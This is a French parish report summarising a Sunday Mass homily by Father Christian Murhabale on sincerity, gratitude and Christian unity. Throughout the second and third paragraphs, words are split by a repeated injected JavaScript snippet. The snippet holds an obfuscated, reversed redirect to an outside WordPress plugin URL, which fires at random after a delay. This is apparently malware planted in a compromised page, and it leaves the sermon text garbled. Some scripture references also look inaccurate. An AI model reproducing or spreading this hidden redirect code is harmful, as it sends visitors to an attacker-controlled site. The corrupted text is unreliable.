La célébration eucharistique de ce dix-septième dimanche du temps ordinaire a été présidée par le Père Christian MURHABALE. La chorale saint Nicolas de Flue a animé la prière en chants liturgiques. Les lectures du jour sont respectivement le Premier Livre des Rois (4, 41-44), l’épitre de saint Paul apôtre aux Ephésiens, et l’Evangile selon saint Jean (1, 1-15).

Dans sa prédication homilétique, le Père Christian a fait savoir que la première disposition pour un chrétien qui veut mener une vie vertueuse conforme à l’Evangile est d’être sincère avec soi-même et avec son prochain. Cette sincérité apparaît dans le langage et dans un comportement irréprochable sans hypocrisie. Ainsi, un chrétien digne de ce nom ne saura détourner pour son profit un message que son prochain lui demande de transmettre à une autre personne ni confisquer des biens qui ne sont pas les siens. Nous n’avons même pas droit de sentir une haine quelconque si nous réalisons que notre prochain a quelque chose de plus que ce que nous avons. Les Ecritures nous disent en effet que la grâce divine que nous avons-nous suffit.

Bien de personnes demandent ou même exigent beaucoup de ma part de Dieu et, après avoir reçu ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont ils avaient besoin, ils oublient de dire merci à celui qui leur avait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné ou lui tournent carrément le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos, ce qui est très toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dommage. Dans la deuxième lecture, l’apôtre Paul se dit prisonnier à cause de la Parole de Dieu, cependant il demande aux chrétiens d’Ephèse de rester toujours unis dans le Seigneur. En restant unis, nous ne garderons plus rancune les uns contre les autres. La rancune, en effet, provoque beaucoup de maux sociaux qui vont jusqu’au meurtre de son prochain. Le prédicateur du jour, s’appuyant sur les Saintes Ecritures, a demandé à tout un chacun d’avoir un esprit serviable comme nous sommes tous fils et filles d’un même Dieu e Père. De plus, nous constatons que chacun et chacune a un certain degré de responsabilité à un certain niveau dans sa société.

Après avoir compris que nous sommes tous frères et sœurs, nous suivrons sans relâche Jésus et ses enseignements comme la foule de gens qui l’a suivi jusqu’autre rive de la mer : elle avait en effet compris que ses Paroles sont vérité et vie. A chaque que des personnes suivent Jésus, celui-ci ne cesse de leur faire du bien : les enseigner, les guérir, leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner à manger et autres. Notre Dieu se soucie vraiment de nous, il nous écoute à chaque fois que nous lui parlons, il se fait voir quand nous le cherchons et se fait un avec nous durant des moments durs de notre vie.  Nous sommes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don appelés à nous approcher de Dieu parce que nous sentirons sa compassion qui nous fera vivre dans la concorde chez nous, au travail et même dans toutes notre société.

NYANDWI M.